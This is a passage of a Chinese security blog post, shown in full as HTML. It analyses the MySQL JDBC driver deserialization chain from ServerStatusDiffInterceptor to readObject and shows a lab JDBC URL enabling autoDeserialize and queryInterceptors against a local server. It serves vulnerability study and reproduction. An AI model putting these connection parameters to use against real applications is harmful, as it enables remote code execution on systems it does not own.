

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.jpg">
  <link rel="icon" href="/img/fluid.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="huangdi">
  <meta name="keywords" content="">
  
    <meta name="description" content="JDBC反序列化分析与漏洞复现">
<meta property="og:type" content="article">
<meta property="og:title" content="Java安全-JDBC反序列化分析">
<meta property="og:url" content="http://huang-d1.github.io/2025/10/29/Java%E5%AE%89%E5%85%A8-JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="huangdi&#39;s blog">
<meta property="og:description" content="JDBC反序列化分析与漏洞复现">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/interactiveJDBC.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j01.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j02.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j03.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j04.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j05.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j06.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j07.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j08.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j09.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j10.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j11.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j12.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j14.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j15.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j16.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j17.png">
<meta property="og:image" content="http://huang-d1.github.io/img/jdbc/j18.png">
<meta property="article:published_time" content="2025-10-29T09:20:46.548Z">
<meta property="article:modified_time" content="2025-10-29T09:22:13.185Z">
<meta property="article:author" content="huangdi">
<meta property="article:tag" content="Java安全">
<meta property="article:tag" content="JDBC">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://huang-d1.github.io/img/jdbc/interactiveJDBC.png">
  
  
  
  <title>Java安全-JDBC反序列化分析 - huangdi&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"huang-d1.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>huang-d1&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Java安全-JDBC反序列化分析"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-10-29 17:20" pubdate>
          2025年10月29日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          37 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Java安全-JDBC反序列化分析</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="Java安全-JDBC反序列化分析"><a href="#Java安全-JDBC反序列化分析" class="headerlink" title="Java安全-JDBC反序列化分析"></a>Java安全-JDBC反序列化分析</h1><h2 id="JDBC基础"><a href="#JDBC基础" class="headerlink" title="JDBC基础"></a>JDBC基础</h2><p>是一种用于Java程序访问关系型数据库的API（应用程序接口）</p>
<p>它允许Java程序员使用标准的SQL语句来访问和操作关系型数据库。JDBC提供了一种标准的方式来连接到不同数据库的驱动程序，并且是Java EE平台上进行数据访问的基础。它提供了许多接口和类，使Java应用程序可以通过它们来访问和管理关系型数据库。</p>
<p>JDBC 对数据库的操作一般有以下步骤</p>
<ul>
<li>导入包：要求您包含包含数据库编程所需的 JDBC 类的软件包。通常，使用 <code>import java.sql.*</code> 就足够了。</li>
<li>注册 JDBC 驱动程序：要求您初始化驱动程序，以便您可以打开与数据库的通信通道。</li>
<li>建立连接：需要使用 <code>* DriverManager.getConnection ()*</code> 方法来创建一个 Connection 对象，该对象表示与数据库服务器的物理连接。要创建新的数据库，在准备数据库 URL 时，无需提供任何数据库名称，如下面的示例所述。</li>
<li>执行查询：需要使用 Statement 类型的对象来构建 SQL 语句并将其提交到数据库。</li>
<li>清理：需要显式关闭所有数据库资源，而不是依赖 JVM 的垃圾回收。</li>
</ul>
<p>创建数据库</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-comment">// 步骤 1. 导入所需的软件包</span><br><span class="hljs-keyword">import</span> java.sql.*;<br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">JDBCExample</span> &#123;<br>   <span class="hljs-comment">// JDBC 驱动程序名称和数据库 URL</span><br>   <span class="hljs-keyword">static</span> <span class="hljs-keyword">final</span> <span class="hljs-type">String</span> <span class="hljs-variable">JDBC_DRIVER</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;com.mysql.jdbc.Driver&quot;</span>;  <br>   <span class="hljs-keyword">static</span> <span class="hljs-keyword">final</span> <span class="hljs-type">String</span> <span class="hljs-variable">DB_URL</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;jdbc:mysql://localhost/&quot;</span>;<br><br>   <span class="hljs-comment">//  数据库凭证</span><br>   <span class="hljs-keyword">static</span> <span class="hljs-keyword">final</span> <span class="hljs-type">String</span> <span class="hljs-variable">USER</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;username&quot;</span>;<br>   <span class="hljs-keyword">static</span> <span class="hljs-keyword">final</span> <span class="hljs-type">String</span> <span class="hljs-variable">PASS</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;password&quot;</span>;<br>   <br>   <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> &#123;<br>   <span class="hljs-type">Connection</span> <span class="hljs-variable">conn</span> <span class="hljs-operator">=</span> <span class="hljs-literal">null</span>;<br>   <span class="hljs-type">Statement</span> <span class="hljs-variable">stmt</span> <span class="hljs-operator">=</span> <span class="hljs-literal">null</span>;<br>   <span class="hljs-keyword">try</span>&#123;<br>      <span class="hljs-comment">// 步骤 2：注册 JDBC 驱动程序</span><br>      Class.forName(<span class="hljs-string">&quot;com.mysql.jdbc.Driver&quot;</span>);<br><br>      <span class="hljs-comment">// 步骤 3：建立连接</span><br>      System.out.println(<span class="hljs-string">&quot;Connecting to database...&quot;</span>);<br>      conn = DriverManager.getConnection(DB_URL, USER, PASS);<br><br>      <span class="hljs-comment">// 步骤 4：执行查询</span><br>      System.out.println(<span class="hljs-string">&quot;Creating database...&quot;</span>);<br>      stmt = conn.createStatement();<br>      <br>      <span class="hljs-type">String</span> <span class="hljs-variable">sql</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;CREATE DATABASE STUDENTS&quot;</span>;<br>      stmt.executeUpdate(sql);<br>      System.out.println(<span class="hljs-string">&quot;Database created successfully...&quot;</span>);<br>   &#125;<span class="hljs-keyword">catch</span>(SQLException se)&#123;<br>      <span class="hljs-comment">// 处理 JDBC 错误</span><br>      se.printStackTrace();<br>   &#125;<span class="hljs-keyword">catch</span>(Exception e)&#123;<br>      <span class="hljs-comment">// 处理 Class.forName 的错误</span><br>      e.printStackTrace();<br>   &#125;<span class="hljs-keyword">finally</span>&#123;<br>      <span class="hljs-comment">// 用于关闭资源</span><br>      <span class="hljs-keyword">try</span>&#123;<br>         <span class="hljs-keyword">if</span>(stmt!=<span class="hljs-literal">null</span>)<br>            stmt.close();<br>      &#125;<span class="hljs-keyword">catch</span>(SQLException se2)&#123;<br>      <br>      &#125;<br>      <span class="hljs-keyword">try</span>&#123;<br>         <span class="hljs-keyword">if</span>(conn!=<span class="hljs-literal">null</span>)<br>            conn.close();<br>      &#125;<span class="hljs-keyword">catch</span>(SQLException se)&#123;<br>         se.printStackTrace();<br>      &#125;<br>   &#125;<span class="hljs-comment">// 结束 try</span><br>   System.out.println(<span class="hljs-string">&quot;Goodbye!&quot;</span>);<br>&#125;<span class="hljs-comment">// 结束 main</span><br>&#125;<span class="hljs-comment">// 结束 JDBCExample</span><br></code></pre></td></tr></table></figure>

<p>这一个 MySQL-JDBC 的漏洞简单来说就是 MySQL 对服务器的请求过程利用</p>
<p><img src="/img/jdbc/interactiveJDBC.png" srcset="/img/loading.gif" lazyload></p>
<p>正常的命令执行得到结果后就结束了，但是如果响应的结果是一个恶意的 poc 并且在后续过程中进行了反序列化，那么就可以用来执行任意命令了</p>
<h2 id="JDBC反序列化漏洞"><a href="#JDBC反序列化漏洞" class="headerlink" title="JDBC反序列化漏洞"></a>JDBC反序列化漏洞</h2><p>如果攻击者能够控制 JDBC 连接设置项，那么就可以通过设置其指向恶意 MySQL 服务器进行 <code>ObjectInputStream.readObject()</code> 的反序列化攻击从而 RCE。</p>
<p>具体点说，就是通过 JDBC 连接 MySQL 服务端时，会有几个内置的 SQL 查询语句要执行，其中两个查询的结果集在 MySQL 客户端被处理时会调用 <code>ObjectInputStream.readObject()</code> 进行反序列化操作。如果攻击者搭建恶意 MySQL 服务器来控制这两个查询的结果集，并且攻击者可以控制 JDBC 连接设置项，那么就能触发 MySQL JDBC 客户端反序列化漏洞。</p>
<p>可被利用的两条查询语句：</p>
<ul>
<li>SHOW SESSION STATUS</li>
<li>SHOW COLLATION</li>
</ul>
<p>补充一下前置知识</p>
<p>这里要先补充一点前置知识</p>
<ul>
<li>BLOB为二进制形式的长文本数据</li>
<li>BIT类型(Bit数据类型用来存储bit值)数据</li>
<li>queryInterceptors:一个逗号分割的Class列表（实现了com.mysql.cj.interceptors.QueryInterceptor接口的Class），在Query”之间”进行执行来影响结果。（效果上来看是在Query执行前后各插入一次操作）</li>
<li>autoDeserialize:自动检测与反序列化存在BLOB字段中的对象</li>
</ul>
<p>这里最重点和最巧妙的就是这个<code>queryInterceptors</code> 参数，直接看文字感觉有点迷，听我解释：</p>
<p>它允许你指定一个或多个实现了 <code>com.mysql.cj.interceptors.QueryInterceptor</code> 接口的类。这些类的目的是在执行 SQL 查询前后进行拦截和操纵，你完全可以理解为，只要JDBC带上了这个，在执行SQL语句前 和 后 他就会有一层类似的<code>Filter</code>，默认调用其 预处理<code>preProcess</code> 和后处理<code>postProcess</code>等方法！！！(实在不懂就需要参考一下java mysql connect的官方连接手册)</p>
<h3 id="链子"><a href="#链子" class="headerlink" title="链子"></a>链子</h3><p>先引入需要的依赖</p>
<p>pom.xml文件</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span>  <br>  <span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>commons-collections<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span>  <br>  <span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>commons-collections<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span>  <br>  <span class="hljs-tag">&lt;<span class="hljs-name">version</span>&gt;</span>3.2.1<span class="hljs-tag">&lt;/<span class="hljs-name">version</span>&gt;</span>  <br><span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>&gt;</span>  <br><span class="hljs-tag">&lt;<span class="hljs-name">dependency</span>&gt;</span>  <br>  <span class="hljs-tag">&lt;<span class="hljs-name">groupId</span>&gt;</span>mysql<span class="hljs-tag">&lt;/<span class="hljs-name">groupId</span>&gt;</span>  <br>  <span class="hljs-tag">&lt;<span class="hljs-name">artifactId</span>&gt;</span>mysql-connector-java<span class="hljs-tag">&lt;/<span class="hljs-name">artifactId</span>&gt;</span>  <br>  <span class="hljs-tag">&lt;<span class="hljs-name">version</span>&gt;</span>8.0.13<span class="hljs-tag">&lt;/<span class="hljs-name">version</span>&gt;</span>  <br><span class="hljs-tag">&lt;/<span class="hljs-name">dependency</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>CC 链作为命令执行的部分，也就是说需要我们找一个 JDBC 合理的入口类，并且这个入口类需要在 JDBC 连接过程中被自动执行，最终是找到了这样一个类 <code>com.mysql.cj.jdbc.result.ResultSetImpl</code>，它的 <code>getObject()</code> 方法调用了 <code>readObject()</code> 方法</p>
<p><img src="/img/jdbc/j01.png" srcset="/img/loading.gif" lazyload></p>
<p>触发这个readObject之前有一些限制条件</p>
<p>这些都会在我们构造Mysql服务器返回包时涉及到</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">public</span> Object <span class="hljs-title function_">getObject</span><span class="hljs-params">(<span class="hljs-type">int</span> columnIndex)</span> <span class="hljs-keyword">throws</span> SQLException &#123;<br>        <span class="hljs-keyword">try</span> &#123;<br>            <span class="hljs-built_in">this</span>.checkRowPos();<br>            <span class="hljs-built_in">this</span>.checkColumnBounds(columnIndex);<br>            <span class="hljs-type">int</span> <span class="hljs-variable">columnIndexMinusOne</span> <span class="hljs-operator">=</span> columnIndex - <span class="hljs-number">1</span>;<br>            <span class="hljs-keyword">if</span> (<span class="hljs-built_in">this</span>.thisRow.getNull(columnIndexMinusOne)) &#123;<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">null</span>;<br>            &#125; <span class="hljs-keyword">else</span> &#123;<br>                <span class="hljs-type">Field</span> <span class="hljs-variable">field</span> <span class="hljs-operator">=</span> <span class="hljs-built_in">this</span>.columnDefinition.getFields()[columnIndexMinusOne];<br>                <span class="hljs-keyword">switch</span> (field.getMysqlType()) &#123;<br>                     <span class="hljs-comment">//判断数据是不是bit类型或者blob类型</span><br>                    <span class="hljs-keyword">case</span> BIT: <br>                        <span class="hljs-keyword">if</span> (!field.isBinary() &amp;amp;&amp;amp; !field.isBlob()) &#123;<br>                            <span class="hljs-keyword">return</span> field.isSingleBit() ? <span class="hljs-built_in">this</span>.getBoolean(columnIndex) : <span class="hljs-built_in">this</span>.getBytes(columnIndex);<br>                        &#125; <span class="hljs-keyword">else</span> &#123;<br>                            <span class="hljs-type">byte</span>[] data = <span class="hljs-built_in">this</span>.getBytes(columnIndex);<br>                            <span class="hljs-keyword">if</span> (!(Boolean)<span class="hljs-built_in">this</span>.connection.getPropertySet().getBooleanProperty(PropertyKey.autoDeserialize).getValue()) &#123;<br>                                <span class="hljs-comment">//获取连接属性的autoDeserialize是否为true</span><br>                                <span class="hljs-keyword">return</span> data;<br>                            &#125; <span class="hljs-keyword">else</span> &#123;<br>                                <span class="hljs-type">Object</span> <span class="hljs-variable">obj</span> <span class="hljs-operator">=</span> data;<br>                                <span class="hljs-keyword">if</span> (data != <span class="hljs-literal">null</span> &amp;amp;&amp;amp; data.length &amp;gt;= <span class="hljs-number">2</span>) &#123; <span class="hljs-comment">//data长度大于等于2</span><br>                                    <span class="hljs-keyword">if</span> (data[<span class="hljs-number">0</span>] != -<span class="hljs-number">84</span> || data[<span class="hljs-number">1</span>] != -<span class="hljs-number">19</span>) &#123;<br>                                        <span class="hljs-comment">// Serialized object 识别是否为序列化后的对象</span><br>                                        <span class="hljs-keyword">return</span> <span class="hljs-built_in">this</span>.getString(columnIndex);<br>                                    &#125;<br>                                    <span class="hljs-comment">// 如果是java的序列化对象，则进入以下逻辑进行反序列化</span><br>                                    <span class="hljs-keyword">try</span> &#123;<br>                                        <span class="hljs-type">ByteArrayInputStream</span> <span class="hljs-variable">bytesIn</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ByteArrayInputStream</span>(data);<br>                                        <span class="hljs-type">ObjectInputStream</span> <span class="hljs-variable">objIn</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">ObjectInputStream</span>(bytesIn);<br>                                        obj = objIn.readObject();<br>                                        objIn.close();<br>                                        bytesIn.close();<br>                                    &#125; <span class="hljs-keyword">catch</span> (ClassNotFoundException var13) &#123;<br>                                        <span class="hljs-keyword">throw</span> SQLError.createSQLException(Messages.getString(<span class="hljs-string">&quot;ResultSet.Class_not_found___91&quot;</span>) + var13.toString() + Messages.getString(<span class="hljs-string">&quot;ResultSet._while_reading_serialized_object_92&quot;</span>), <span class="hljs-built_in">this</span>.getExceptionInterceptor());<br>                                    &#125; <span class="hljs-keyword">catch</span> (IOException var14) &#123;<br>                                        obj = data;<br>                                    &#125;<br>                                &#125;<br></code></pre></td></tr></table></figure>

<p>JDBC 通过 MySQL 数据库查询数据会返回一个结果集，将查询到的结果返回给程序，并将结果封装在 <code>ResultSetImpl</code> 这个类中</p>
<p>所以这个类不满足<strong>用户可控输入</strong>这一点，所以我们应该要去找谁调用了 <code>ResultSetImpl#getObject()</code></p>
<p>这个传入的参数应该是从上层直接传进来的</p>
<p>根据网上的链子是 <code>ResultSetUtil</code> 类调用了 <code>ResultSetImpl#getObject()</code>，并且能够继续向上调用（如果 tabby 或者其他工具搞好了应该会用那些工具分析）</p>
<p><code>ResultSetUtil</code> 这个类是用来处理一些测试实例的结果，或者是 profiler 的结果，简而言之还是用来做数据处理的类</p>
<p><img src="/img/jdbc/j02.png" srcset="/img/loading.gif" lazyload></p>
<p>继续往上看谁调用了它</p>
<p>最终是 <code>com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor#populateMapWithSessionStatusValues</code> 方法调用了 <code>ResultSetUtil#resultSetToMap</code></p>
<p><img src="/img/jdbc/j03.png" srcset="/img/loading.gif" lazyload></p>
<p>继续向上查找用法，发现 preProcess 和 postProcess 方法都有调用此方法</p>
<p><code>ServerStatusDiffInterceptor</code> 是一个拦截器，在 JDBC URL 中设定属性 <code>queryInterceptors</code> 为 <code>ServerStatusDiffInterceptor</code> 时，执行查询语句会调用拦截器的 preProcess 和 postProcess 方法，这是一个自动执行的过程，我们可以把它作为利用链头</p>
<p><img src="/img/jdbc/j04.png" srcset="/img/loading.gif" lazyload></p>
<p>再看一下<code>populateMapWithSessionStatusValues</code> 方法的代码</p>
<p>先建立了 JDBC 的连接，并创建查询，查询语句是 <code>SHOW SESSION STATUS</code>，接着调用 <code>ResultSetUtil.resultSetToMap</code>，完成查询并封装查询结果</p>
<p>这个<code>SHOW SESSION STATUS</code>查询语句就是我们刚刚说的执行时会触发反序列化的语句</p>
<p><img src="/img/jdbc/j05.png" srcset="/img/loading.gif" lazyload></p>
<p>小结一下</p>
<p>那么整条链子就很清晰了 从MySQL服务端获取到字节码数据后，判断autoDeserialize是否为true、字节码数据是否为序列化对象等，最后调用readObject()触发反序列化漏洞</p>
<p>在mysql的getconnect过程中会去触发一系列函数从而触发我们手动配置的queryInterceptors(可以类比于一个拦截查询器)进行一个SQL Query的查询，其中在以上代码分析当中可以看出如果查询拦截器不为空，则调用的查询拦截器的<code>preProcess()</code>方法，然后进入到<code>preProcess()</code>该方法后执行了 <code>SHOW SESSION STATUS</code> ,然后把返回来的结果(此时这个sql查询是已经在恶意的mysql中返回的结果)，调用了<code>resultSetToMap()</code>方法然后把返回的结果传进去，该函数中就调用了触发反序列化漏洞的getObject()函数(注意columnIndex为2处才能走到反序列化的代码逻辑，因为为1则直接返回null)</p>
<p>MySQL JDBC客户端在开始连接MySQL服务端时，会执行一些如<code>set autocommit=1</code> 等SQL Query，其中会触发我们所配置的queryInterceptors中的preProcess()函数，在该函数逻辑中、当MySQL字段类型为BLOB时，会对数据进行反序列化操作，因此只要保证SHOW SESSION STATUS响应包中设置字段为BLOB类型且存储了恶意序列化数据即可触发反序列化漏洞。</p>
<h3 id="数据包分析"><a href="#数据包分析" class="headerlink" title="数据包分析"></a>数据包分析</h3><p>先执行一次真实的查询，抓包观察一下流量</p>
<p>构造一个JDBC客户端</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> com.example;<br><br><span class="hljs-keyword">import</span> java.sql.*;<br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Test</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception &#123;<br>        Class.forName(<span class="hljs-string">&quot;com.mysql.jdbc.Driver&quot;</span>);<br>        <span class="hljs-type">String</span> <span class="hljs-variable">jdbc_url</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;jdbc:mysql://127.0.0.1:3306/root?characterEncoding=UTF-8&amp;serverTimezone=Asia/Shanghai&quot;</span> +<br>                <span class="hljs-string">&quot;&amp;autoDeserialize=true&quot;</span> +<br>                <span class="hljs-string">&quot;&amp;queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&quot;</span>;<br>        <span class="hljs-type">Connection</span> <span class="hljs-variable">con</span> <span class="hljs-operator">=</span> DriverManager.getConnection(jdbc_url, <span class="hljs-string">&quot;root&quot;</span>, <span class="hljs-string">&quot;123456&quot;</span>);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>在本地开一个mysql服务，配置数据库信息后运行，使用wireshark进行抓包，并使用以下过滤语句过滤3306端口的mysql协议</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">tcp.port == 3306 &amp;&amp; mysql<br></code></pre></td></tr></table></figure>

<p><img src="/img/jdbc/j06.png" srcset="/img/loading.gif" lazyload></p>
<p>我们需要用 python 脚本伪造的 MySQL 服务端需要伪造的是 <code>Greeting</code> 数据包 <code>Response OK</code> 、<code>Response Response OK</code> 以及 JDBC 执行查询语句 <code>SHOW SESSION STATUS</code> 的返回包等，我们逐个来分析。</p>
